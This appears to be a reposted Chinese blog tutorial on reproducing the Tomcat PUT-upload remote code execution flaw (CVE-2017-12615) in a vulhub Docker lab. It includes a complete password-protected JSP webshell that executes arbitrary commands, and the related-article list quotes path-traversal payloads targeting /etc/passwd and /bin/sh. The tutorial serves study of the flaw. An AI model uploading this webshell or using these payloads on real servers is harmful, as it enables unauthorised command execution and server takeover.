漏洞复现——tomcat远程代码执行漏洞

最新推荐文章于 2025-03-17 17:47:21 发布
转载 最新推荐文章于 2025-03-17 17:47:21 发布 · 192 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/xiaoqiyue/p/9954493.html
文章标签:

#java #web.xml #runtime

漏洞描述:

当存在该漏洞的Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT请求方法,攻击者可通过构造的攻击请求向服务器上传包含任意代码的 JSP 文件,造成任意代码执行

影响范围:

Apache Tomcat 7.0.0 - 7.0.79

漏洞分析:

该漏洞的触发条件有两个,第一tomcat需要运行在Windows主机上,第二要启用PUT请求方法,复现该漏洞时,只需在conf/web.xml中添加

<init-param> 

 <param-name>readonly</param-name> 

  <param-value>false</param-value> 

</init-param>
当resdonly的值为true时,是不开启PUT的方法的,当它为false时,则是开启PUT方法


修复方案:
禁用PUT方法即可

实验步骤:
1.docker上开启tomcat服务:

cd vulhub/

cd tomcat/

cd CVE-2017-12615/

docker-compose build

docker-compose up -d

 



2.Windows上打开tomcat网页,开始上传jsp文件

bp抓包修改包,go:将get方法修改为PUT,加上jsp文件的文件名(红色框),并且将要上传的jsp文件直接粘贴到下面(黄色框)

jsp代码:

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp

+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

 

3.查看是否上传成功,并执行代码

成功上传,查看whoami,jsp木马的密码是023

 

 

 

 

 

转载于:https://www.cnblogs.com/xiaoqiyue/p/9954493.html

Apache Tomcat漏洞复现
m0_56578216的博客
09-07 1780
来到vulhub/tomcat/tomcat8/靶场。
[ vulhub漏洞复现篇 ] Apache Tomcat 文件包含漏洞 (CVE-2020-1938)
qq_51577576的博客
05-31 614
🍬博主介绍 👨‍🎓 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋 🙏作者水平有限,欢迎各位大佬指点,相互学习进步! 目录 🍬博主介绍 一、漏洞简介 二、漏洞编号(选填) 三、漏洞靶场(选填) 1. vulhub靶场环境搭建 2. 切换到此靶场目录 3. 启动靶场 4. 查看启.....
tomcat远程代码执行漏洞(cve-2017-12615)复现
dbabs的博客
02-12 443
cve-2017-12615
[ 中间件漏洞 ] Tomcat 远程代码执行漏洞 (CVE-2017-12615)
weixin_30852451的博客
07-12 353
0x00.前言:   当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法,攻击者通过构造的攻击请求向服务器上传包含任意代码的 JSP 文件,可造成任意代码执行。   受影响版本:Tomcat7.0.0 – 7.0.79(7.0.81修复不完全)   漏洞前提:开启PUT上传 0x01.漏洞复现:   复现版本:Tomcat 7.0.11 1.Tom...
Apache Tomcat 漏洞复现
来日可期的博客
09-08 5692
Tomcat7 弱密码和后端 Getshell 漏洞,Aapache Tomcat AJP任意文件读取/包含漏洞,通过 PUT 方法Tomcat 任意写入文件漏洞
tomcat远程代码执行漏洞验证
04-17
tomcat远程代码执行漏洞验证
Apache Struts2远程代码执行漏洞(S2-001)复现
2401_87298694的博客
09-21 871
​ OGNL还支持处理集合即Map,List和Set。​ 除了#,% 在 OGNL 表达式中也经常出现,它提供一个OGNL表达式运行环境。
文件包含漏洞之——tomcat CVE-2020-1938漏洞复现
Hacker_by_V的博客
09-08 1302
这个漏洞是今年2月份出现的,他的影响范围也是非常广的。 2月20日,国家信息安全漏洞共享平台(CNVD)发布了Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938),这个漏洞是由于Tomcat AJP协议存在缺陷而导致,而攻击者利用该漏洞通过构造特定参数,读取服务webapp下的任意文件,若目标服务器存在文件上传功能,攻击者可以进一步实现远程代码执行漏洞复现步骤 1.docker启动环境 2.Python2 poc.py 172.18.0.2 -p 800
CVE-2022-22965 Spring远程代码执行漏洞复现
weixin_45260839的博客
05-22 4111
CVE-2022-22965 Spring远程代码执行漏洞复现
Tomcat漏洞之——通过PUT远程代码执行
热门推荐
明月阁
09-26 1万+
原文链接:http://www.dubby.cn/detail.html?id=9034 本文仅为技术分享,任何利用里技术的行为都和本文无关。 这是Tomcat在2017.9.19日公布的一个漏洞:根据邮件描述,我们下了windows版tomcat 7.0.79,安装成功后,需要首先允许tomcat进行PUT操作,也就是修改/conf/web.xml:<servlet> <ser
Apache Tomcat文件包含漏洞复现(详细教程)
weixin_60838266的博客
07-18 4655
TomcatApache开源组织开发的用于处理HTTP服务的项目,两者都是免费的,都可以做为独立的Web服务器运行。Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件或源代码等。Apache Tomcat服务器通过Connector连接器组件与客户程序建立连接,Connector表示接收请求返回响应的端点。即Connector组件负责接收客户的请求,以及把Tomcat服务器的响应结果发送给客户。
CVE重要漏洞复现Tomcat-CVE-2020-1983漏洞
没有网络安全就没有国家安全
03-17 1529
CVE重要漏洞复现Tomcat-CVE-2020-1983漏洞
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 2927
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx
xiaoheizi的博客
07-13 414
将访问路径更改为:/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd 因为是Unix系统,所以敏感信息在/etc/passwd下,放包成功获取数据。将访问路径更改为:/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh。点击测试链接,如果测试成功就点击添加。打开vulfocus靶场,启动漏洞环境,打开漏洞地址。打开vulfocus靶场,启动漏洞环境,打开漏洞地址。
干货|最全的Tomcat漏洞复现
关注微信公众号【开源Linux】,后台回复『10T』,领取10T学习资源大放送,涵盖Linux、虚拟化、容器、云计算、网络、Python、Go等书籍和视频
09-06 1806
简介TomcatApache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开...
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
weixin_43102772的博客
03-09 6202
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
Tomcat 远程代码执行漏洞分析(CVE-2017-12615)
fly小灰灰的专栏
11-06 7147
1. 漏洞描述 漏洞简述: 当tomcat启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。 CVE编号:CVE-2017-12615 影响版本:Apache Tomcat 7.0.0-
Tomcat远程代码执行漏洞(CVE-2017-12615)
Unitue_逆流
10-14 1万+
实验环境操作机:windows XPIP:172.16.11.2目标机:windows server 2003IP:172.16.12.2实验目的了解Tomcat远程代码执行漏洞危害掌握检测利用Tomcat远程代码执行漏洞的能力实验工具Firefox: 中文俗称火狐,一个自由及开放源代码网页浏览器实验内容 TomcatTomcat服务器是一个免费的开放源代码的Web应用服务器。Tomcat是Apa
复现awvs——POODLE 攻击(带 CBC 密码套件的 SSLv3—CVE-2014-3566)
记录并分享学习安全的知识点..
12-29 2338
1.首先通过awvs对网站进行扫描如下: 2.通过一种工具github中开源工具testssl进行复现,先进行下载,我这边下载好了,有需要的去我百度云盘下载链接:https://pan.baidu.com/s/1V-TbIVsC541D8yEmEkppWA 提取码:需要的评论区扣1,私发 3.下面就直接利用这个工具,利用之前先用./testssl.sh --h查看一下用法 发现参数为-O时是可以检查POODLE漏洞是否存在的 4.使用命令./testssl.sh -O +url来验证漏洞是否存.
tomcat远程命令执行漏洞复现
最新发布
03-29
### 关于 Tomcat 远程命令执行漏洞复现方法 #### 漏洞概述 Tomcat远程命令执行漏洞主要涉及其反序列化机制的安全隐患以及某些默认配置下的潜在风险。以下是几个典型的 CVE 编号及其对应的复现条件: 1. **CVE...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值